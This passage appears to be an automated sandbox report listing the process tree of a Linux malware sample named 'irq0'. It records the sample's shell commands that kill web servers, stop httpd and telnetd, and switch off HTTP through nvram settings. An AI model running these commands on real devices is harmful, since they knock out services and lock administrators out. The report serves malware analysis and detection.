    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: uname PID: 5591 Parent PID: 5553

    General

    Start time:05:27:14
    Start date:25/03/2021
    Path:/bin/uname
    Arguments:/bin/uname -n
    File size:31440 bytes
    MD5 hash:1078d9dca4e90919f7b2433cae105008

    Analysis Process: irq0 PID: 5607 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5607 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "kill -9 `cat /var/run/httpd.pid` > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5609 Parent PID: 5607

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5610 Parent PID: 5609

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 5610 Parent PID: 5609

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/httpd.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq0 PID: 5611 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5611 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service httpd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5613 Parent PID: 5611

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 5613 Parent PID: 3310

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service httpd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 5653 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5653 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5673 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5673 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5692 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 5692 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 5753 Parent PID: 5613

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 5754 Parent PID: 5753

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 5754 Parent PID: 5753

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 5755 Parent PID: 5753

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 5755 Parent PID: 5753

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 6015 Parent PID: 5613

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6015 Parent PID: 5613

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6060 Parent PID: 5613

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6060 Parent PID: 5613

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6185 Parent PID: 5613

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6185 Parent PID: 5613

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6381 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6381 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6453 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6453 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6478 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6478 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6506 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6506 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6535 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6535 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmpolld.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6567 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6567 Parent PID: 5613

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lxd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6581 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6581 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show saned.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6605 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6605 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show snapd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6628 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6628 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show ssh.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6659 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6659 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show syslog.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6691 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6691 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-bus-proxyd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6750 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6750 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-fsckd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6777 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6777 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-initctl.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6812 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6812 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-audit.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6848 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6848 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald-dev-log.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6870 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6870 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-journald.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6903 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6903 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-networkd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6929 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6929 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-rfkill.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6961 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6961 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-control.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6975 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6975 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show systemd-udevd-kernel.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 7010 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 7010 Parent PID: 5613

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show uuidd.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: systemctl PID: 5613 Parent PID: 3310

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl stop httpd.service
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: irq0 PID: 5615 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5615 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 mini_httpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5628 Parent PID: 5615

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5628 Parent PID: 5615

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 mini_httpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5640 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5640 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 minihttpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5667 Parent PID: 5640

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5667 Parent PID: 5640

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 minihttpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5671 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5671 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "kill -9 `cat /var/run/thttpd.pid` > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5677 Parent PID: 5671

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5680 Parent PID: 5677

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: cat PID: 5680 Parent PID: 5677

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/cat
    Arguments:cat /var/run/thttpd.pid
    File size:52080 bytes
    MD5 hash:efa10d52f37361f2e3a5d22742f0fcc4

    Analysis Process: irq0 PID: 5678 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5678 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "nvram set httpd_enable=0 > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq0 PID: 5719 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5719 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "nvram set http_enable=0 > /dev/null 2>&1"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: irq0 PID: 5751 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5751 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "killall -9 httpd > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5756 Parent PID: 5751

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: killall PID: 5756 Parent PID: 3310

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/killall
    Arguments:killall -9 httpd
    File size:23736 bytes
    MD5 hash:df59c8b62bfcf5b3bd7feaaa2295a9f7

    Analysis Process: irq0 PID: 5757 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:./irq0
    Arguments:n/a
    File size:0 bytes
    MD5 hash:unknown

    Analysis Process: sh PID: 5757 Parent PID: 5545

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:sh -c "service telnetd stop > /dev/null 2>&1 &"
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: sh PID: 5763 Parent PID: 5757

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/sh
    Arguments:n/a
    File size:4 bytes
    MD5 hash:e02ea3c3450d44126c46d658fa9e654c

    Analysis Process: service PID: 5763 Parent PID: 5757

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:/bin/sh /usr/sbin/service telnetd stop
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 5781 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5781 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5808 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: basename PID: 5808 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/bin/basename
    Arguments:basename /usr/sbin/service
    File size:31408 bytes
    MD5 hash:fd7bba8b11b99ec7559f30226c79a729

    Analysis Process: service PID: 5854 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 5854 Parent PID: 5763

    General

    Start time:05:27:16
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl --quiet is-active multi-user.target
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6014 Parent PID: 5763

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: service PID: 6018 Parent PID: 6014

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6018 Parent PID: 6014

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl list-unit-files --full --type=socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6019 Parent PID: 6014

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: sed PID: 6019 Parent PID: 6014

    General

    Start time:05:27:17
    Start date:25/03/2021
    Path:/bin/sed
    Arguments:sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    File size:73424 bytes
    MD5 hash:c1a00c583ba08e728b10f3f46f5776d6

    Analysis Process: service PID: 6186 Parent PID: 5763

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6186 Parent PID: 5763

    General

    Start time:05:27:18
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show acpid.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6379 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6379 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show apport-forward.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6451 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6451 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show avahi-daemon.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6479 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6479 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show cups.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6505 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6505 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dbus.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6545 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6545 Parent PID: 5763

    General

    Start time:05:27:19
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show dm-event.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6571 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

    Analysis Process: systemctl PID: 6571 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/bin/systemctl
    Arguments:systemctl -p Triggers show lvm2-lvmetad.socket
    File size:659848 bytes
    MD5 hash:b08096235b8c90203e17721264b5ce40

    Analysis Process: service PID: 6603 Parent PID: 5763

    General

    Start time:05:27:20
    Start date:25/03/2021
    Path:/usr/sbin/service
    Arguments:n/a
    File size:10057 bytes
    MD5 hash:81c4fe604ec67916db7b223725e5a9c6

